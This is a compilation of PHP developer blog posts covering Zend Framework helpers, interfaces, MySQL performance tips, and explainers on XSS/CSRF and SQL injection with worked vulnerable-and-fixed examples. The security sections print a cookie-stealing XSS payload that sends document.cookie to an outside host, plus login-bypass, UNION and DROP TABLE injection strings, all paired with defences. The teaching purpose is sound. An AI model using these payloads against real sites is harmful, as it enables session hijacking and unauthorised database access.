Zend Helpers: View Helpers and Controller Action Helper

For any PHP function, php.net is the best reference; the same cannot be said for Zend. The Zend documentation is poor: the developers who gave their best to the Zend Framework did not give nearly as much to its documentation.

Let's move to the main topic. Today, after a long time, I am going to show you how to create a "Zend Controller Action Helper".

Don't confuse Zend_View_Helper with Zend_Controller_Action_Helper. Both are helpers, but for different layers, as their names suggest: the first is a view helper, the second an action controller helper.

1. Zend View Helper:

Creating A Helper Class:

I have created a helper class named Myapp_View_Helper_Adminhelper, stored as Adminhelper.php in the views/helpers directory under APPLICATION_PATH (the directory registered in the bootstrap below).

class Myapp_View_Helper_Adminhelper
{
    // Helper entry point; returning $this lets the view chain the other methods.
    public function adminhelper()
    {
        return $this;
    }

    public function formatDate($date)
    {
        return date('d-m-Y h:i:s a', strtotime($date));
    }
}

A view helper class must have a method named after the helper, i.e. the last segment of the class name (Adminhelper, conventionally written in lower case; PHP method names are case-insensitive). That method is what the view calls, a kind of constructor that is not invoked through __construct(). So what if you want more than one helper function in the same class? The trick I used is to return the class object from that main method, so that any other method defined in the helper class can be called on the result.


The class is ready, but to stop Zend throwing an error when its methods are called from a view script, its path has to be added to the view's helper paths. If you already have an _initView() method in your Bootstrap.php, modify it as below.

protected function _initView()
{
    // Initialize view
    $view = new Zend_View();

    // Add it to the ViewRenderer
    $viewRenderer = Zend_Controller_Action_HelperBroker::getStaticHelper('ViewRenderer');
    $viewRenderer->setView($view);

    // Adding View Helper Path
    $view->addHelperPath(APPLICATION_PATH . '/views/helpers', 'Myapp_View_Helper');

    // Return it, so that it can be stored by the bootstrap
    return $view;
}

If you do not have an _initView() method in your Bootstrap.php, create one with any name you like (e.g. _initViewHelpers), build the $view object inside it as above, and add the helper path in the same way. That's it. You can check that the path was registered with $view->getHelperPaths(), which returns all registered helper paths.

Now we can call view helpers class function as…

<?php echo $this->adminhelper()->formatDate($requestedps->created_on); ?>

In the code above, $this->adminhelper() returns the helper object, so formatDate() can be called on it as shown.

That is all you need to implement a view helper. Zend ships a number of view helpers by default that you can use without any hassle.

Now let's continue with action helpers:

2. Zend Controller Action Helper:

I was working on the admin panel. In every controller action that displayed all the records of a database table I was using the Zend pagination component, and I had to repeat the same small pagination snippet in every action. I could have written a normal method in the controller class, but that would have been limited to that controller, and I wanted to use the pagination on the front end too. It was the perfect time to start with Zend controller action helpers.

I created a directory named actionhelpers inside the application folder, i.e. at the same level as views and controllers. You can give it any name you like, or nest folders; what matters is that action helpers must be registered in Bootstrap.php in the same way as view helpers, and you have to take care to do that registration correctly.

class Myapp_Actionhelper_Common extends Zend_Controller_Action_Helper_Abstract
{
    protected $view;

    public function pagination($result_set, $style = 'digg')
    {
        // Request parameters are attacker-controlled; cast them so that only
        // integers reach the paginator and the view.
        $page = (int) $this->getRequest()->getParam('page', 1);
        $records_per_page = (int) $this->getRequest()->getParam('shown', 10);

        $paginator = Zend_Paginator::factory($result_set);
        $paginator->setCurrentPageNumber($page);
        $paginator->setItemCountPerPage($records_per_page);

        $record_count = sizeof($result_set);

        $view = $this->getView();
        $view->page = $page;
        $view->records_per_page = $records_per_page;
        $view->numrows = $record_count;
        $view->pagination_config = array(
            'total_items'    => $record_count,
            'items_per_page' => $records_per_page,
            'style'          => $style,
        );
        $view->records = $paginator;
    }

    // The abstract helper has no view accessor, so fetch it from the controller once.
    public function getView()
    {
        if (null !== $this->view) {
            return $this->view;
        }

        $controller = $this->getActionController();
        $this->view = $controller->view;
        return $this->view;
    }
}

First you have to tell Zend where your action helper is, so that it does not throw an error:

protected function _initActionHelpers()
{
    // Adding Action Helper Path
    Zend_Controller_Action_HelperBroker::addPath(APPLICATION_PATH . '/actionhelpers', 'Myapp_Actionhelper');
}

Here APPLICATION_PATH is a constant holding the path to my application folder.

Now, in a controller action, you can call the helper like this:

public function someAction()
{
    // ... fetch $request_res from the database table ...

    // The broker resolves 'common' to Myapp_Actionhelper_Common through the
    // path registered in the bootstrap and calls the helper's method.
    $this->_helper->common->pagination($request_res);
}

where $request_res is the record set fetched from the database table.




Abstraction and interfaces

Abstraction and interfaces are two very different tools. They are as close as hammers and drills. Abstract classes may have implemented methods, whereas interfaces have no implementation in themselves.

Abstract classes that declare all their methods as abstract are not interfaces with different names. One can implement multiple interfaces, but not extend multiple classes (or abstract classes).

The use of abstraction vs interfaces is problem specific and the choice is made during the design of software, not its implementation. In the same project you may as well offer an interface and a base (probably abstract) class as a reference that implements the interface. Why would you do that?

Let us assume that we want to build a system that calls different services, which in turn have actions. Normally, we could offer a method called execute that accepts the name of the action as a parameter and executes the action.

We want to make sure that classes can actually define their own ways of executing actions. So we create an interface IService that has the execute method. Well, in most of your cases, you will be copying and pasting the exact same code for execute.

We can create a reference implementation for a class named Service and implement the execute method. So, no more copying and pasting for your other classes! But what if you want to extend MySQLi? You can implement the interface (copy-paste probably), and there you are, again with a service. Abstraction can be included in the class for initialisation code, which cannot be predefined for every class that you will write.

Hope this is not too mind-boggling and helps someone. Cheers,
Alexios Tsiaparas

From PHP.net
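
An added example, not part of the php.net comment quoted above, showing the arrangement it describes: the IService interface, the abstract reference implementation Service that carries the shared execute(), and a class that already extends another class and therefore implements the interface directly. CounterService, ListService, init(), actions() and the use of ArrayObject in place of MySQLi are invented here so that it runs without a database; the allow-list of action names in execute() is my addition, because dispatching on an unchecked string would let a caller invoke any method on the object.

```php
<?php
// Added example (not the php.net commenter's code): IService, an abstract
// reference implementation, and a class that implements the interface directly.

interface IService
{
    public function execute(string $action, array $params = []);
}

// Reference implementation: execute() is written once here instead of being
// copied into every service. It stays abstract because each service still has
// to supply its own initialisation and its own list of callable actions.
abstract class Service implements IService
{
    private $initialised = false;

    abstract protected function init();

    // Names of the methods a caller may reach through execute(). Dispatching on
    // an unchecked string would expose every method of the object.
    abstract protected function actions(): array;

    public function execute(string $action, array $params = [])
    {
        if (!$this->initialised) {
            $this->init();
            $this->initialised = true;
        }
        if (!in_array($action, $this->actions(), true)) {
            throw new InvalidArgumentException("unknown action: $action");
        }
        return $this->$action(...$params);
    }
}

class CounterService extends Service
{
    private $count = 0;

    protected function init() { $this->count = 100; }        // per-class setup, runs once
    protected function actions(): array { return ['add']; }

    public function add(int $n): int { return $this->count += $n; }
    public function reset(): void { $this->count = 0; }       // deliberately not exposed
}

// A class that must extend another class (the comment's MySQLi case; ArrayObject
// stands in so the example needs no database) cannot also extend Service, so it
// implements IService itself.
class ListService extends ArrayObject implements IService
{
    public function execute(string $action, array $params = [])
    {
        if ($action !== 'size') {
            throw new InvalidArgumentException("unknown action: $action");
        }
        return $this->count();
    }
}

$c = new CounterService();
echo $c->execute('add', [5]), "\n";   // init() runs, then add(5)
echo $c->execute('add', [1]), "\n";   // init() is not run again

$l = new ListService(['a', 'b', 'c']);
echo $l->execute('size'), "\n";

try {
    $c->execute('reset');             // not in actions(): rejected
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
```

Both services satisfy IService, so code that only needs execute() can be handed either one; only CounterService gets the shared dispatch and one-time init() for free.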

Eclipse Debugger error and solution

Strange but true! If you are using Eclipse and any of your browsers has the uTorrent plugin, Eclipse repeatedly throws the debugging error until you close every browser that has the uTorrent plugin installed.

Solution: remove the uTorrent plugin from the browser. I am talking about the browser plugin, not the uTorrent program.

Top 20+ MySQL Best Practices

Database operations often tend to be the main bottleneck for most web applications today. It is not only the DBAs (database administrators) who have to worry about these performance issues. We as programmers need to do our part by structuring tables properly, writing optimized queries and writing better code. Here are some MySQL optimization techniques for programmers.

1. Optimize Your Queries For the Query Cache
Many MySQL servers have query caching enabled. It is one of the most effective ways of improving performance, and it is handled quietly by the database engine: when the same query is executed several times, the result is served from the cache, which is very fast.
The main problem is that because it is so easy and hidden from the programmer, most of us tend to ignore it, and some things we do can prevent the query cache from doing its job.
// query cache does NOT work
$r = mysql_query("SELECT username FROM user WHERE signup_date >= CURDATE()");

// query cache works!
$today = date("Y-m-d");
$r = mysql_query("SELECT username FROM user WHERE signup_date >= '$today'");
The reason the query cache does not work for the first query is the use of CURDATE(). The same applies to all non-deterministic functions such as NOW() and RAND(): because the function's result can change, MySQL disables caching for that query. All we need to do is compute the value in one extra line of PHP before the query. Caveat: the query cache was deprecated in MySQL 5.7.20 and removed in MySQL 8.0, so this item only applies to older servers.

2. EXPLAIN Your SELECT Queries
Using the EXPLAIN keyword can give you insight on what MySQL is doing to execute your query. This can help you spot the bottlenecks and other problems with your query or table structures.
The results of an EXPLAIN query will show you which indexes are being utilized, how the table is being scanned and sorted etc…
Take a SELECT query (preferably a complex one, with joins) and add the keyword EXPLAIN in front of it. You can just use phpMyAdmin for this; it will show the results in a nice table. For example, let's say I forgot to add an index to a column that I perform joins on:

After adding the index to the group_id field:

Now instead of scanning 7883 rows, it will only scan 9 and 16 rows from the 2 tables. A good rule of thumb is to multiply all numbers under the “rows” column, and your query performance will be somewhat proportional to the resulting number.

3. LIMIT 1 When Getting a Unique Row
Sometimes when you are querying your tables, you already know you are looking for just one row. You might be fetching a unique record, or you might just be checking whether any record satisfies your WHERE clause.
In such cases, adding LIMIT 1 to your query can increase performance. This way the database engine will stop scanning for records after it finds just 1, instead of going thru the whole table or index.
// do I have any users from Alabama?

// what NOT to do:
$r = mysql_query("SELECT * FROM user WHERE state = 'Alabama'");
if (mysql_num_rows($r) > 0) {
    // ...
}

// much better:
$r = mysql_query("SELECT 1 FROM user WHERE state = 'Alabama' LIMIT 1");
if (mysql_num_rows($r) > 0) {
    // ...
}

4. Index the Search Fields
Indexes are not just for the primary keys or the unique keys. If there are any columns in your table that you will search by, you should almost always index them.

As you can see, this rule also applies on a partial string search like “last_name LIKE ‘a%’”. When searching from the beginning of the string, MySQL is able to utilize the index on that column.
You should also understand which kinds of searches can not use the regular indexes. For instance, when searching for a word (e.g. “WHERE post_content LIKE ‘%apple%’”), you will not see a benefit from a normal index. You will be better off using mysql fulltext search or building your own indexing solution.

5. Index and Use Same Column Types for Joins
If your application contains many JOIN queries, you need to make sure that the columns you join by are indexed on both tables. This affects how MySQL internally optimizes the join operation.
Also, the columns that are joined, need to be the same type. For instance, if you join a DECIMAL column, to an INT column from another table, MySQL will be unable to use at least one of the indexes. Even the character encodings need to be the same type for string type columns.
// looking for companies in my state
// $user_id is interpolated into SQL, so it must be an integer (cast or bound) first
$r = mysql_query("SELECT company_name FROM users
    LEFT JOIN companies ON (users.state = companies.state)
    WHERE users.id = " . (int) $user_id);

// both state columns should be indexed
// and they both should be the same type and character encoding
// or MySQL might do full table scans

6. Avoid ORDER BY RAND()
This is one of those tricks that sounds cool at first, and many rookie programmers fall for it. You may not realize what kind of terrible bottleneck you create once you start using it in your queries.
If you really need random rows out of your results, there are much better ways of doing it. Granted, it takes additional code, but you will prevent a bottleneck that gets worse the more data you have: MySQL has to evaluate RAND() for every single row in the table and then sort all of them, just to give you 1 row.
// what NOT to do:
$r = mysql_query("SELECT username FROM user ORDER BY RAND() LIMIT 1");

// much better:

$r = mysql_query("SELECT count(*) FROM user");
$d = mysql_fetch_row($r);
$rand = mt_rand(0, $d[0] - 1);

$r = mysql_query("SELECT username FROM user LIMIT $rand, 1");
So you pick a random number less than the number of rows and use it as the offset in your LIMIT clause. (LIMIT still has to walk past the first $rand rows, so on very large tables a lookup by a random id between MIN(id) and MAX(id) is faster still, at the cost of uneven picks when the ids have gaps.)

7. Avoid SELECT *
The more data is read from the tables, the slower the query will become. It increases the time it takes for the disk operations. Also when the database server is separate from the web server, you will have longer network delays due to the data having to be transferred between the servers.
It is a good habit to always specify which columns you need when you are doing your SELECTs.
// not preferred
$r = mysql_query("SELECT * FROM user WHERE user_id = 1");
$d = mysql_fetch_assoc($r);
echo "Welcome {$d['username']}";

// better:
$r = mysql_query("SELECT username FROM user WHERE user_id = 1");
$d = mysql_fetch_assoc($r);
echo "Welcome {$d['username']}";

// the differences are more significant with bigger result sets

8. Almost Always Have an id Field
In every table have an id column that is the PRIMARY KEY, AUTO_INCREMENT and one of the flavors of INT. Also preferably UNSIGNED, since the value can not be negative.
Even if you have a users table that has a unique username field, do not make that your primary key. VARCHAR fields as primary keys are slower. And you will have a better structure in your code by referring to all users with their id’s internally.
There are also behind the scenes operations done by the MySQL engine itself, that uses the primary key field internally. Which become even more important, the more complicated the database setup is. (clusters, partitioning etc…).
One possible exception to the rule are the “association tables”, used for the many-to-many type of associations between 2 tables. For example a “posts_tags” table that contains 2 columns: post_id, tag_id, that is used for the relations between two tables named “post” and “tags”. These tables can have a PRIMARY key that contains both id fields.

9. Use ENUM over VARCHAR
ENUM type columns are very fast and compact. Internally they are stored like TINYINT, yet they can contain and display string values. This makes them a perfect candidate for certain fields.
If you have a field, which will contain only a few different kinds of values, use ENUM instead of VARCHAR. For example, it could be a column named “status”, and only contain values such as “active”, “inactive”, “pending”, “expired” etc…
There is even a way to get a “suggestion” from MySQL itself on how to restructure your table. When you do have a VARCHAR field, it can actually suggest you to change that column type to ENUM instead. This done using the PROCEDURE ANALYSE() call. Which brings us to:

10. Get Suggestions with PROCEDURE ANALYSE()
PROCEDURE ANALYSE() will let MySQL analyze the columns structures and the actual data in your table to come up with certain suggestions for you. It is only useful if there is actual data in your tables because that plays a big role in the decision making.
For example, if you created an INT field for your primary key, however do not have too many rows, it might suggest you to use a MEDIUMINT instead. Or if you are using a VARCHAR field, you might get a suggestion to convert it to ENUM, if there are only few unique values.
You can also run this by clicking the “Propose table structure” link in phpmyadmin, in one of your table views.

Keep in mind these are only suggestions, and if your table is going to grow bigger they may not even be the right suggestions to follow. The decision is ultimately yours. Caveat: PROCEDURE ANALYSE() was deprecated in MySQL 5.7 and removed in MySQL 8.0.

11. Use NOT NULL If You Can
Unless you have a very specific reason to use a NULL value, you should always set your columns as NOT NULL.
First of all, ask yourself if there is any difference between having an empty string value vs. a NULL value (for INT fields: 0 vs. NULL). If there is no reason to have both, you do not need a NULL field. (Did you know that Oracle considers NULL and empty string as being the same?)
NULL columns require additional space and they can add complexity to your comparison statements. Just avoid them when you can. However, I understand some people might have very specific reasons to have NULL values, which is not always a bad thing.
From MySQL docs:
“NULL columns require additional space in the row to record whether their values are NULL. For MyISAM tables, each NULL column takes one bit extra, rounded up to the nearest byte.”

12. Prepared Statements
There are multiple benefits to using prepared statements, both for performance and for security.
With a prepared statement the SQL text is sent to the server first and the bound values afterwards, as data rather than as part of the statement, so a bound value can never change the structure of the query. That is what protects your application against SQL injection; it is not filtering, and it only covers the values you bind, not table or column names or anything else you still concatenate into the SQL. You can of course escape your variables manually, but that is more prone to human error and forgetfulness. This is less of an issue when using a framework or ORM that does it for you.
Since our focus is on performance, I should mention the benefits in that area too. They are more significant when the same query is used several times in your application: you can assign different values to the same prepared statement, and MySQL only has to parse it once.
Newer versions of MySQL also transmit prepared statements in a native binary form, which is more efficient and can reduce network delays.
There was a time when many programmers avoided prepared statements on purpose for one important reason: they were not cached by the MySQL query cache. Since around version 5.1 they are cached too (and, as noted in item 1, the query cache itself is gone in MySQL 8.0).
To use prepared statements in PHP, look at the mysqli extension or use a database abstraction layer like PDO.
// create a prepared statement
if ($stmt = $mysqli->prepare("SELECT username FROM user WHERE state=?")) {

    // bind parameters
    $stmt->bind_param("s", $state);

    // execute
    $stmt->execute();

    // bind result variables
    $stmt->bind_result($username);

    // fetch value
    $stmt->fetch();

    printf("%s is from %s\n", $username, $state);

    $stmt->close();
}


13. Unbuffered Queries
Normally when you perform a query from a script, it will wait for the execution of that query to finish before it can continue. You can change that by using unbuffered queries.
There is a great explanation in the PHP docs for the mysql_unbuffered_query() function:
“mysql_unbuffered_query() sends the SQL query query to MySQL without automatically fetching and buffering the result rows as mysql_query() does. This saves a considerable amount of memory with SQL queries that produce large result sets, and you can start working on the result set immediately after the first row has been retrieved as you don’t have to wait until the complete SQL query has been performed.”
However, it comes with certain limitations. You have to either read all the rows or call mysql_free_result() before you can perform another query. Also you are not allowed to use mysql_num_rows() or mysql_data_seek() on the result set. (The mysql_* extension was removed in PHP 7; with mysqli the equivalent is mysqli_query() with the MYSQLI_USE_RESULT flag, or mysqli_real_query() followed by mysqli_use_result().)

14. Store IP Addresses as UNSIGNED INT
Many programmers create a VARCHAR(15) field without realizing that they can store IP addresses as integer values. With an INT you go down to 4 bytes of space and get a fixed-size field.
You have to make sure your column is an UNSIGNED INT, because IPv4 addresses use the whole range of a 32-bit unsigned integer.
In your queries you can use INET_ATON() to convert an IP to an integer, and INET_NTOA() for the reverse. PHP has similar functions, ip2long() and long2ip().
// $user_id is interpolated into SQL, so it must be cast (or bound) first
$r = "UPDATE users SET ip = INET_ATON('{$_SERVER['REMOTE_ADDR']}') WHERE user_id = " . (int) $user_id;
Caveat: this only fits IPv4. On a dual-stack server REMOTE_ADDR may already be an IPv6 string, which INET_ATON() cannot convert; for IPv6 use a VARBINARY(16) column with INET6_ATON() and INET6_NTOA(), available since MySQL 5.6.

15. Fixed-length (Static) Tables are Faster
When every single column in a table is “fixed-length”, the table is also considered “static” or “fixed-length”. Examples of column types that are NOT fixed-length are: VARCHAR, TEXT, BLOB. If you include even just 1 of these types of columns, the table ceases to be fixed-length and has to be handled differently by the MySQL engine.
Fixed-length tables can improve performance because it is faster for MySQL engine to seek through the records. When it wants to read a specific row in a table, it can quickly calculate the position of it. If the row size is not fixed, every time it needs to do a seek, it has to consult the primary key index.
They are also easier to cache and easier to reconstruct after a crash. But they also can take more space. For instance, if you convert a VARCHAR(20) field to a CHAR(20) field, it will always take 20 bytes of space regardless of what is it in.
By using “Vertical Partitioning” techniques, you can separate the variable-length columns to a separate table. Which brings us to:

16. Vertical Partitioning
Vertical Partitioning is the act of splitting your table structure in a vertical manner for optimization reasons.
Example 1: You might have a users table that contains home addresses, that do not get read often. You can choose to split your table and store the address info on a separate table. This way your main users table will shrink in size. As you know, smaller tables perform faster.
Example 2: You have a “last_login” field in your table. It updates every time a user logs in to the website. But every update on a table causes the query cache for that table to be flushed. You can put that field into another table to keep updates to your users table to a minimum.
But you also need to make sure you don’t constantly need to join these 2 tables after the partitioning or you might actually suffer performance decline.

17. Split the Big DELETE or INSERT Queries
If you need to perform a big DELETE or INSERT query on a live website, you need to be careful not to disturb the web traffic. When a big query like that is performed, it can lock your tables and bring your web application to a halt.
Apache runs many parallel processes/threads. Therefore it works most efficiently when scripts finish executing as soon as possible, so the servers do not experience too many open connections and processes at once that consume resources, especially the memory.
If you end up locking your tables for any extended period of time (like 30 seconds or more), on a high traffic web site, you will cause a process and query pileup, which might take a long time to clear or even crash your web server.
If you have some kind of maintenance script that needs to delete large numbers of rows, just use the LIMIT clause to do it in smaller batches to avoid this congestion.
while (1) {
    mysql_query("DELETE FROM logs WHERE log_date <= '2009-10-01' LIMIT 10000");
    if (mysql_affected_rows() == 0) {
        // done deleting
        break;
    }
    // you can even pause a bit between batches
    usleep(50000);
}

18. Smaller Columns Are Faster
With database engines, disk is perhaps the most significant bottleneck. Keeping things smaller and more compact is usually helpful in terms of performance, to reduce the amount of disk transfer.
MySQL docs have a list of Storage Requirements for all data types.
If a table is expected to have very few rows, there is no reason to make the primary key an INT, instead of MEDIUMINT, SMALLINT or even in some cases TINYINT. If you do not need the time component, use DATE instead of DATETIME.
Just make sure you leave reasonable room to grow or you might end up like Slashdot.

19. Choose the Right Storage Engine
The two main storage engines in MySQL are MyISAM and InnoDB. Each have their own pros and cons.
MyISAM is good for read-heavy applications, but it doesn’t scale very well when there are a lot of writes. Even if you are updating one field of one row, the whole table gets locked, and no other process can even read from it until that query is finished. MyISAM is very fast at calculating SELECT COUNT(*) types of queries.
InnoDB tends to be a more complicated storage engine and can be slower than MyISAM for small applications. But it supports row-level locking, which scales better, and more advanced features such as transactions and foreign keys. InnoDB has been the default storage engine since MySQL 5.5, and for new tables it is almost always the right choice.

20. Use an Object Relational Mapper
By using an ORM (Object Relational Mapper), you can gain certain performance benefits. Everything an ORM can do, can be coded manually too. But this can mean too much extra work and require a high level of expertise.
ORMs are great for "lazy loading": they can fetch values only as they are needed. But you need to be careful with them, or you can end up creating too many mini-queries that reduce performance.
ORM’s can also batch your queries into transactions, which operate much faster than sending individual queries to the database.
Currently my favorite ORM for PHP is Doctrine. I wrote an article on how to install Doctrine with CodeIgniter.

21. Be Careful with Persistent Connections
Persistent connections are meant to reduce the overhead of recreating connections to MySQL. When a persistent connection is created, it stays open even after the script finishes running. Since Apache reuses its child processes, the next time the process runs a new script it reuses the same MySQL connection.
mysql_pconnect() in PHP
It sounds great in theory. But from my personal experience (and many others'), this feature turns out not to be worth the trouble. You can have serious problems with connection limits, memory issues and so on.
Apache runs extremely parallel, and creates many child processes. This is the main reason that persistent connections do not work very well in this environment. Before you consider using the mysql_pconnect() function, consult your system admin.

Cross Site Request Forgery (CSRF)

CSRF is often conflated with XSS (cross-site scripting), and most of what follows is about XSS: injecting HTML and JavaScript into a page so that it runs in other users' browsers. CSRF proper is the last phase described below, where a request is forged against a site the victim is already logged into; the two are often chained, which is where the confusion comes from.

When you go for an interview for the post of Sr. Web Developer, you must know about security issues and the latest technology news. I failed to answer such questions, but then I realised that I must know about these issues.

Simply mastering coding does not make you a good programmer. You cannot ignore security issues.

XSS is possible by injecting HTML and JavaScript code into a page. When the page containing the injected HTML and JavaScript loads, the injected code is executed. You must be thinking: is that possible? The answer is YES. It is possible in two ways:

1. Active Injection:

This injection is possible through a feedback form, a comment form or blog posts. Instead of a comment, the hacker submits HTML containing a JavaScript snippet, so the payload is stored in the database.
Now, whenever a page containing that data is rendered, the JavaScript is executed.

e.g 1:
document.write('<img src="http://mysite.com/code.php?params=' + document.cookie + '">');
In this sample we pass the logged-in member's cookies to another web site.

Blog users are allowed to add images. An HTML-enabled editing view lets a user add code like
e.g 2:
<img src="http://mysite.com/image.png" onmouseover="DoSomethingMalicious();" />

Such code makes it possible to send secret and critical information to the hacker's site.

2. Passive Injection:

This injection uses the site's search functionality. Surprised? When someone searches for something on the site, the results page echoes the term back in a format like

Search result for "Harry Potter" or
Did you mean "Harry Potter"

where "Harry Potter" is the term that was searched. So a hacker can put complete JavaScript code like e.g. 1 and e.g. 2 above into the search term, craft a link containing it, and send critical information to their server when a victim follows the link.

Passive injection is more dangerous in one respect: nothing is stored, the payload runs once per crafted link, and the site admin has no record of it in the database.
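
The reflected case above, as an added example that is not part of the original post: a search page that echoes the query term, first raw (the vulnerable form the post describes) and then passed through htmlspecialchars(). The payload is constructed here and uses an onerror handler rather than the onmouseover of e.g. 2 so that it needs no user interaction; mysite.com and code.php are the post's own placeholder names, and the function names are invented.

```php
<?php
// Added example (not the post's code): the "Search result for ..." page,
// rendered unescaped and then with output encoding.

function render_search_vulnerable(string $q): string
{
    // Raw interpolation: whatever is in $q becomes part of the page's markup.
    return "<p>Search result for \"$q\"</p>";
}

function render_search_safe(string $q): string
{
    // htmlspecialchars with ENT_QUOTES turns < > & " ' into entities, so the
    // browser displays the payload as text instead of parsing it as a tag.
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Search result for \"$safe\"</p>";
}

// Constructed payload, the shape a victim would receive in a crafted link such
// as search.php?q=...: it closes the quoted text, then adds an <img> whose
// handler ships document.cookie to the attacker's server.
$payload = '"><img src="x" onerror="new Image().src=\'http://mysite.com/code.php?params=\'+document.cookie">';

echo render_search_vulnerable($payload), "\n";
echo render_search_safe($payload), "\n";
```

Run it with php and compare the two lines: in the first, the browser would see a real <img> tag with an event handler; in the second, every <, >, " and ' has become an entity and the text is shown verbatim. The same encoding must be applied to anything echoed from the request or the database (the stored case in section 1), and it is context-specific: inside a JavaScript block or a URL, HTML entity encoding is not enough on its own.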

XSS attacks that lead to CSRF are generally performed in 4 phases:

Phase 1 : Injection phase
During this phase the hacker injects the HTML, CSS or JavaScript into the vulnerable web site.

Image: Phases of CSRF

Phase 2 : Code obtention phase
The victim's browser downloads a JavaScript file hosted on another web site (this phase is not mandatory, but it is more comfortable for the hacker, who would otherwise have to send the entire payload during the injection phase).

Phase 3 and 4:  Code execution
During these phases the browser executes the code. Usually the first step is to retrieve the session cookie and the second is to send a forged request to the web site. The web server accepts the request because it carries the victim's session cookie; this is the CSRF part. Setting the HttpOnly flag on the session cookie keeps script from reading it, and a per-session anti-CSRF token checked on every state-changing request stops the forged request from being accepted.

So while coding, always keep these points in mind.
A good programmer must provide a strong shield against hackers.

God Bless Programmers

(Rajan Y. Rawal)

SQL Injection

SQL injection: a basic introduction.

Almost one year in PHP coding, and still I was not aware of it technically. I use the word "technically" because I knew what could be done to prevent SQL injection but had not yet actually implemented it.

But today, by luck, I got some time and figured out what SQL injection actually is.

SQL injection can be used for anonymous login and for fetching database table details;
it can select table data, insert rows and much more.

Here I am giving you the whole idea of how SQL injection can be used for anonymous login.
If you understand it thoroughly, use it to protect your code and not to damage other people's databases. 🙂


1. SQL injection is possible because of the way MySQL delimits strings with ' (single quote).

Here is how it works: look at where you build a select query and see how the single quote does its magic.
$user = "user1";
$pass = "pass1";

$query = "select * from users where username='$user' and password='$pass'";

echo $query;

//output: select * from users where username='user1' and password='pass1'

The above query is simple sql query. where username and password parameters are enclosed by single quotes(i.e between ‘ and ‘).

Now observe the parameters below:

$user = "user1";

$pass = "pass1' OR 1='1";

$query = "select * from users where username='$user' and password='$pass'";

echo $query;

//output: select * from users where username='user1' and password='pass1' OR 1='1'

The quote inside $pass closes the password literal, so the rest of it is parsed as SQL. AND binds tighter than OR, so the condition reads (username='user1' and password='pass1') OR 1='1', which is true for every row of the table.

2. UNION: MySQL UNION functionality

Suppose your page test.php accepts a parameter

e.g.: test.php?id=2

and drops it into the query unquoted (WHERE id=$id). A hacker can then pass the id value as (the + signs are URL-encoded spaces)

e.g.:

test.php?id=-2 UNION SELECT * FROM Profiles WHERE ID=89

The negative id makes the original SELECT return nothing, so the page renders the row the attacker asked for instead. The attacker's SELECT has to return the same number of columns as the original query, which is usually found by trial and error with UNION SELECT 1,2,3,...

Something like

tests.php?id=-2; DROP TABLE Profiles

is a different case: UNION can only combine SELECTs, so a DROP TABLE needs a second statement. mysql_query() refuses to run more than one statement per call, but drivers that allow multiple statements (mysqli_multi_query(), or PDO's MySQL driver depending on its settings) do not, so the input still has to be treated as hostile.

Preliminary steps to stop SQL injection:

1. Be specific in your coding, especially on the page that your form action posts to.

e.g. check for your submit button before doing anything else:

if (isset($_POST['submit'])) {
    // ... remaining code
}

2. Be specific about the form variables:
Be specific about the method and about how you read the variables after the form is posted.
If <form method='post'> is used in the form:
// if method='post'
$name = $_POST['name'];
$password = $_POST['password'];
Similarly, if you used <form method='get'>, then read from $_GET.

Note: don't use $_REQUEST, don't be lazy. I am emphasizing this most of all.

3. Check the row count exactly where you know how many rows to expect

e.g. for login there can be only one row matching username and password
// if method='post'
$name = $_POST['name'];
$password = $_POST['password'];

$query = "select * from users where name='$name' && password='$password'";

$result = mysql_query($query);
$num_rows = mysql_num_rows($result);
if ($num_rows == 1) {            // don't use if($num_rows > 0)
    // ... we are specific about the count
}

Caveat: this catches the ' OR 1='1 trick, which matches every row, but it is not a defence by itself. A username of admin'-- turns the rest of the query into a comment, matches exactly one row and passes the check. The query itself still has to be escaped or, better, parameterised.
4. Typecast for integer values
For e.g:
get variable id value in other page as
$id = (int)$_GET[‘id’];
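
The login bypass from section 1 and the prepared-statement fix, as an added example that is not from the original post. It uses PDO with an in-memory SQLite database so it runs offline; the users table, its rows and the function names are constructed here, and passwords are left in plain text only to keep the focus on the injection (a real login would compare a password hash).

```php
<?php
// Added example (not the post's code): the login query run by concatenation and
// as a prepared statement against a constructed in-memory SQLite table.

function make_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
    $db->exec("INSERT INTO users (username, password) VALUES ('admin', 's3cret'), ('user1', 'pass1')");
    return $db;
}

// Vulnerable: the values become part of the SQL text, so a quote in $pass
// ends the string literal and the rest is parsed as SQL.
function login_concat(PDO $db, string $user, string $pass): int
{
    $query = "SELECT * FROM users WHERE username='$user' AND password='$pass'";
    return count($db->query($query)->fetchAll());
}

// Hardened: placeholders. The SQL text is fixed when prepare() runs and the
// values travel separately, so they can never change the query's shape.
function login_prepared(PDO $db, string $user, string $pass): int
{
    $stmt = $db->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
    $stmt->execute([$user, $pass]);
    return count($stmt->fetchAll());
}

$db = make_db();

// Same idea as the post's pass1' OR 1='1. SQLite compares the integer 1 and the
// text '1' as different types, so the quoted form is used here; in MySQL both work.
$payload = "pass1' OR '1'='1";

printf("concat,   wrong password : %d row(s)\n", login_concat($db, 'user1', 'wrong'));
printf("concat,   injected       : %d row(s)\n", login_concat($db, 'user1', $payload));
printf("prepared, injected       : %d row(s)\n", login_prepared($db, 'user1', $payload));

// Why a row-count check is not a defence on its own: a comment sequence in the
// username discards the password clause and matches exactly one row.
printf("concat,   admin'--       : %d row(s)\n", login_concat($db, "admin'-- ", 'whatever'));
```

Run it with php (the pdo_sqlite extension is bundled with most builds). The concatenated version returns no row for a wrong password but every row for the injected one, while the prepared version returns none for the same input. The last call shows the weakness of step 3: admin'-- comments out the password clause and matches exactly one row, so a count of 1 passes the check.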

Now I am sure your SQL injection concept is a little clearer.
You can google for
=> mysql_real_escape_string // escapes quotes according to the connection's character set, so it only works while a connection is open; the whole mysql_* extension was removed in PHP 7, where mysqli_real_escape_string() is the equivalent
=> addcslashes // adds backslashes before chosen characters; it is not SQL-aware and is no substitute for escaping or parameterising
Prepared statements (mysqli or PDO, see item 12 of the MySQL notes above) avoid the escaping question altogether.

Hope you would explore more… Keep Coding

God Bless Developers